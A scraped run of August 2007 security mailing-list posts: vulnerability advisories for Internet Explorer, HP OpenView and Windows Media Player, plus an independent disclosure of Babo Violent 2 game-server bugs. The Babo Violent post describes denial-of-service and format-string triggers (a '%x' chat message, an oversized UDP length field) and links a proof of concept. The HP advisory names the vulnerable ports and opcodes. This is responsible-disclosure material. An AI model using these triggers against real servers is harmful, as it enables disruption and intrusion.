2007.0/i586/libkoffice2-kword-1.5.91-3.4mdv2007.0.i586.rpm 625ab40c0b52acb12537ad4e54601f3a 2007.0/i586/libkoffice2-kword-devel-1.5.91-3.4mdv2007.0.i586.rpm e5b36cd2cdfda939be530878a20b5e17 2007.0/i586/libkoffice2-progs-1.5.91-3.4mdv2007.0.i586.rpm 4325bc6081491592c8702bd10c5f80e6 2007.0/i586/libkoffice2-progs-devel-1.5.91-3.4mdv2007.0.i586.rpm 6d9829b5d53b02fb0c840beea7b807c4 2007.0/SRPMS/koffice-1.5.91-3.4mdv2007.0.src.rpm Mandriva Linux 2007.0/X86_64: 0558f3f2c7e3184683f7a057035f7d55 2007.0/x86_64/koffice-1.5.91-3.4mdv2007.0.x86_64.rpm cbc7c57476b41aa115308d92a7f5c944 2007.0/x86_64/koffice-karbon-1.5.91-3.4mdv2007.0.x86_64.rpm b2550c0d21ab49fb00b951337e38b75d 2007.0/x86_64/koffice-kexi-1.5.91-3.4mdv2007.0.x86_64.rpm 2733627f37bddc7a26ba60970b052a68 2007.0/x86_64/koffice-kformula-1.5.91-3.4mdv2007.0.x86_64.rpm fa0450f5d4ad768d4aa1e3197cf4b6e1
ZDI-07-048: Microsoft Internet Explorer substringData() Heap Overflow Vulnerability
ZDI-07-048: Microsoft Internet Explorer substringData() Heap Overflow Vulnerability http://www.zerodayinitiative.com/advisories/ZDI-07-048.html August 14, 2007 -- CVE ID: CVE-2007-2223 CVE-2007-2224 -- Affected Vendor: Microsoft -- Affected Products: Windows 2000 Windows XP Windows Server 2003 Windows Vista Windows Office 2003 Visual Basic 6.0 -- TippingPoint(TM) IPS Customer Protection: TippingPoint IPS customers have been protected against this vulnerability since February 8, 2007 by Digital Vaccine protection filter ID 5098. For further product information on the TippingPoint IPS: http://www.tippingpoint.com -- Vulnerability Details: This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of various Microsoft software User interaction is required to exploit this vulnerability in that the target must visit a malicious page. The specific flaw exists in the substringData() method available on the TextNode JavaScript object. When specific parameters are passed to the method, an integer overflow occurs causing incorrect memory allocation. If this event occurs after a different ActiveX object has been instantiated, an exploitable condition is created when the ActiveX object is deallocated which can result in the execution of arbitrary code. -- Vendor Response: Microsoft has issued updates to correct this vulnerability. More details can be found at: http://www.microsoft.com/technet/security/bulletin/ms07-042.mspx http://www.microsoft.com/technet/security/bulletin/ms07-043.mspx -- Disclosure Timeline: 2006.10.03 - Vulnerability reported to vendor 2007.02.08 - Digital Vaccine released to TippingPoint customers 2007.08.14 - Coordinated public release of advisory -- Credit: This vulnerability was discovered by an anonymous researcher. -- About the Zero Day Initiative (ZDI): Established by TippingPoint, a division of 3Com, The Zero Day Initiative (ZDI) represents a best-of-breed model for rewarding security researchers for responsibly disclosing discovered vulnerabilities. Researchers interested in getting paid for their security research through the ZDI can find more information and sign-up at: http://www.zerodayinitiative.com The ZDI is unique in how the acquired vulnerability information is used. 3Com does not re-sell the vulnerability details or any exploit code. Instead, upon notifying the affected product vendor, 3Com provides its customers with zero day protection through its intrusion prevention technology. Explicit details regarding the specifics of the vulnerability are not exposed to any parties until an official vendor patch is publicly available. Furthermore, with the altruistic aim of helping to secure a broader user base, 3Com provides this vulnerability information confidentially to security vendors (including competitors) who have a vulnerability protection or mitigation product. CONFIDENTIALITY NOTICE: This e-mail message, including any attachments, is being sent by 3Com for the sole use of the intended recipient(s) and may contain confidential, proprietary and/or privileged information. Any unauthorized review, use, disclosure and/or distribution by any recipient is prohibited. If you are not the intended recipient, please delete and/or destroy all copies of this message regardless of form and any included attachments and notify 3Com immediately by contacting the sender via reply e-mail or forwarding to 3Com at [EMAIL PROTECTED]
Multiple vulnerabilities in Babo Violent 2 2.08.00
### Luigi Auriemma Application: Babo Violent 2 http://www.rndlabs.ca http://baboviolent.net Versions: = 2.08.00 Platforms:Windows and Linux Bugs: A] crash through malformed value B] format string C] crash through unexistent map D] crash through malformed UDP packet Exploitation: A, B and C versus server (both dedicated and game) D versus both clients and server Date: 14 Aug 2007 Author: Luigi Auriemma e-mail: [EMAIL PROTECTED] web:aluigi.org ### 1) Introduction 2) Bugs 3) The Code 4) Fix ### === 1) Introduction === Babo Violent 2 is a famous free multiplayer game developed by RndLabs (now under bitHeads). ### === 2) Bugs === A] crash through malformed value The data with ID 0xca, 0xcb, 0xcc, 0xce, 0xcf and 0xd0 have a first byte which if is set to a value major or equal than 0x28 (this number can change) causes the crash of the program. In my tests doesn't seem possible to use this bug for executing remote code although some registers change their values using different data after this byte. B] format string The output function used by the server is vulnerable to a format string bug exploitable through the messages and the admin login. An easy way to test the problem is through the sending of a message containing %x. --- C] crash through unexistent map --- If the client specifies a map which is not available, the server will terminate due to the exception (stream != NULL). What the server does is calling fopen() with the value passed by the client plus the .bvm extension in the map folder (note that if the filename is not NULLed there will be many garbage bytes before the extension). - D] crash through malformed UDP packet - Both the servers and the clients open another port other than which is 1, this port is used for LAN queries and by clients. In short each UDP packet is composed by a 16 bit number which specifies the size of the data in the packet. It's enough to send a small UDP packet with a big 16 bit value for forcing the program (client or server) to read outside the available memory of the packet causing a crash: memcpy(buffer_of_65536, packet + 9, *(uint16_t *)(packet + 7)); Note that all the IP addresses of the clients are visibile in the server through the playerlist command, so an attacker can decide to kick only the players he wants or all of them or just the entire server. Note: the password protection in servers doesn't seem to work very well that's why sometimes these in-game bugs can be exploited also in protected servers without knowing the needed keyword, it's enough to reconnect if the connection closes... and be lucky. Another interesting thing is that the sender of the chat messages is specified by the client so is possible to spoof any message. ### === 3) The Code === http://aluigi.org/poc/bv2x.zip ### == 4) Fix == I have posted the details of the bugs on dev.baboviolent.net about ten days ago but nobody has done something. ### --- Luigi Auriemma http://aluigi.org http://mirror.aluigi.org
TPTI-07-14: HP OpenView Multiple Product Shared Trace Service Stack Overflow Vulnerabilities
TPTI-07-14: HP OpenView Multiple Product Shared Trace Service Stack Overflow Vulnerabilities http://dvlabs.tippingpoint.com/advisory/TPTI-07-14 August 14, 2007 -- CVE ID: CVE-2007-1676 -- Affected Vendor: Hewlett-Packard -- Affected Products: HP OpenView Internet Service HP OpenView Performance Manager HP OpenView Performance Agent HP OpenView Reporter HP OpenView Operations HP OpenView Operations Manager for Windows HP OpenView Service Quality Manager HP OpenView Network Node Manager HP OpenView Business Process Insight and Related Products HP OpenView Dashboard HP OpenView Performance Insight -- TippingPoint(TM) IPS Customer Protection: TippingPoint IPS customers have been protected against this vulnerability since August 14, 2007 by Digital Vaccine protection filter ID 4787. For further product information on the TippingPoint IPS: http://www.tippingpoint.com -- Vulnerability Details: These vulnerabilities allow remote attackers to execute arbitrary code on vulnerable installations of multiple Hewlett-Packard (HP) OpenView products, including: Performance Manager, Performance Agent, Reporter, Operations, Operations Manager, Service Quality Manager, Network Node Manager, Business Process Insight, Dashboard and Performance Insight. Authentication is not required to exploit these vulnerabilities. The specific flaws exists within the OpenView Shared Trace Service. A service that is distributed with multiple products as ovtrcsvc.exe and OVTrace.exe. The vulnerable service may be found bound to TCP port 5053 (ovtrcsvc.exe) or TCP port 5051 (OVTrace.exe). Specially crafted data through opcode handlers 0x1a and 0x0f can result in arbitrary code execution under the context of the SYSTEM user. -- Vendor Response: Hewlett-Packard has issued updates to correct this vulnerability. More details can be found at: http://h2.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c01106515 http://h2.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c01109171 http://h2.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c01109584 http://h2.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c01109617 http://h2.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c01110576 http://h2.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c01110627 http://h2.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c0851 http://h2.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c01112038 http://h2.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c01114023 http://h2.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c01114156 http://h2.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c01115068 -- Disclosure Timeline: 2006.10.10 - Vulnerability reported to vendor 2007.08.14 - Digital Vaccine released to TippingPoint customers 2007.08.14 - Coordinated public release of advisory -- Credit: This vulnerability was discovered by Cody Pierce, Pedram Amini, Aaron Portnoy of TippingPoint DVLabs. CONFIDENTIALITY NOTICE: This e-mail message, including any attachments, is being sent by 3Com for the sole use of the intended recipient(s) and may contain confidential, proprietary and/or privileged information. Any unauthorized review, use, disclosure and/or distribution by any recipient is prohibited. If you are not the intended recipient, please delete and/or destroy all copies of this message regardless of form and any included attachments and notify 3Com immediately by contacting the sender via reply e-mail or forwarding to 3Com at [EMAIL PROTECTED]
Re: COSEINC Linux Advisory #1: Linux Kernel Parent Process Death Signal Vulnerability
I'm not sure this is a real security issue. If some process has the same effective UID as the given one, the former can always send any signal to the latter. Thus the behaviour you described is IMHO normal. It becomes a security issue whenever suid process drops user's UIDs.
ZDI-07-046: Microsoft Windows Media Player Skin Parsing Size Mismatch Heap Overflow Vulnerability
ZDI-07-046: Microsoft Windows Media Player Skin Parsing Size Mismatch Heap Overflow Vulnerability http://www.zerodayinitiative.com/advisories/ZDI-07-046.html August 14, 2007 -- CVE ID: CVE-2007-3037 -- Affected Vendor: Microsoft -- Affected Products: Windows Media Player 7.1 Windows Media Player 9 Windows Media Player 10 Windows Media Player 11 -- TippingPoint(TM) IPS Customer Protection: TippingPoint IPS customers have been protected against this vulnerability since August 14, 2007 by Digital Vaccine protection filter ID 5535. For further product information on the TippingPoint IPS: http://www.tippingpoint.com -- Vulnerability Details: This vulnerability allows attackers to execute arbitrary code on vulnerable installations of Microsoft Windows Media Player. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists during the parsing of malformed skin files (WMZ). A size compressed / decompressed size mismatch can result in an under allocated heap buffer which can be leveraged by an attacker to eventually execute arbitrary code under the context of the current user. -- Vendor Response: Microsoft has issued an update to correct this vulnerability. More details can be found at: http://www.microsoft.com/technet/security/bulletin/MS07-047.mspx -- Disclosure Timeline: 2007.03.19 - Vulnerability reported to vendor 2007.08.14 - Digital Vaccine released to TippingPoint customers 2007.08.14 - Coordinated public release of advisory -- Credit: This vulnerability was discovered by Piotr Bania. -- About the Zero Day Initiative (ZDI): Established by TippingPoint, a division of 3Com, The Zero Day Initiative (ZDI) represents a best-of-breed model for rewarding security researchers for responsibly disclosing discovered vulnerabilities. Researchers interested in getting paid for their security research through the ZDI can find more information and sign-up at: http://www.zerodayinitiative.com The ZDI is unique in how the acquired vulnerability information is used. 3Com does not re-sell the vulnerability details or any exploit code. Instead, upon notifying the affected product vendor, 3Com provides its customers with zero day protection through its intrusion prevention technology. Explicit details regarding the specifics of the vulnerability are not exposed to any parties until an official vendor patch is publicly available. Furthermore, with the altruistic aim of helping to secure a broader user base, 3Com provides this vulnerability information confidentially to security vendors (including competitors) who have a vulnerability protection or mitigation product. CONFIDENTIALITY NOTICE: This e-mail message, including any attachments, is being sent by 3Com for the sole use of the intended recipient(s) and may contain confidential, proprietary and/or privileged information. Any unauthorized review, use, disclosure and/or distribution by any recipient is prohibited. If you are not the intended recipient, please delete and/or destroy all copies of this message regardless of form and any included attachments and notify 3Com immediately by contacting the sender via reply e-mail or forwarding to 3Com at [EMAIL PROTECTED]
ZDI-07-047: Microsoft Windows Media Player Malformed Skin Header Code Execution Vulnerability
ZDI-07-047: Microsoft Windows Media Player Malformed Skin Header Code Execution Vulnerability http://www.zerodayinitiative.com/advisories/ZDI-07-047.html August 14, 2007 -- CVE ID: CVE-2007-3035 -- Affected Vendor: Microsoft -- Affected Products: Windows Media Player 7.1 Windows Media Player 9 Windows Media Player 10 Windows Media Player 11 -- Vulnerability Details: This vulnerability allows attackers to execute arbitrary code on vulnerable installations of Microsoft Windows Media Player. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists while decompressing skin files (.WMZ and .WMD) with malformed headers. During this process the malformed values are used to improperly calculate data which can later allow an attacker to execute code under the rights of the current user. -- Vendor Response: Microsoft has issued an update to correct this vulnerability. More details can be found at: http://www.microsoft.com/technet/security/bulletin/MS07-047.mspx -- Disclosure Timeline: 2007.05.22 - Vulnerability reported to vendor 2007.08.14 - Coordinated public release of advisory -- Credit: This vulnerability was discovered by Piotr Bania. -- About the Zero Day Initiative (ZDI): Established by TippingPoint, a division of 3Com, The Zero Day Initiative (ZDI) represents a best-of-breed model for rewarding security researchers for responsibly disclosing discovered vulnerabilities. Researchers interested in getting paid for their security research through the ZDI can find more information and sign-up at: http://www.zerodayinitiative.com The ZDI is unique in how the acquired vulnerability information is used. 3Com does not re-sell the vulnerability details or any exploit code. Instead, upon notifying the affected product vendor, 3Com provides its customers with zero day protection through its intrusion prevention technology. Explicit details regarding the specifics of the vulnerability are not exposed to any parties until an official vendor patch is publicly available. Furthermore, with the altruistic aim of helping to secure a broader user base, 3Com provides this vulnerability information confidentially to security vendors (including competitors) who have a vulnerability protection or mitigation product. CONFIDENTIALITY NOTICE: This e-mail message, including any attachments, is being sent by 3Com for the sole use of the intended recipient(s) and may contain confidential, proprietary and/or privileged information. Any unauthorized review, use, disclosure and/or distribution by any recipient is prohibited. If you are not the intended recipient, please delete and/or destroy all copies of this message regardless of form and any included attachments and notify 3Com immediately by contacting the sender via reply e-mail or forwarding to 3Com at [EMAIL PROTECTED]
